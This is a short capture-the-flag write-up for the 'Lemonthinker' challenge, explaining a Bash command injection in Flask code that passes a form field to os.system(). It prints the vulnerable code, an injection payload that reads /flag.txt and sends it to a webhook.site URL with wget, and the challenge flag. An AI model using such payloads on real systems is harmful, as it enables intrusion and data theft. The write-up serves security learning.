Lemonthinker

generate your lemonthinks here!

Challenge

TL;DR: Bash command injection.

The source code for this challenge isn’t too long, which makes the glaring vulnerability even more obvious:

Source: app/app.py

text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")

That’s right, the user-controlled variable text (coming from the HTTP parameter text) is being inserted directly into an os.system() function call. We can execute OS commands by wrapping them inside $(), such as $(whoami).

Let’s read the flag and exfiltrate to our external server. Send the following string in the

$(cat /flag.txt | xargs -I{} wget "https://webhook.site/c6cf5fb0-9a87-439d-aa8c-4dfbb3a65fef/?flag={}")

:lemonthink: and the flag will be delivered 😎🚩

Flag: rarctf{b451c-c0mm4nd_1nj3ct10n_f0r-y0u_4nd_y0ur-l3m0nth1nk3rs_d8d21128bf}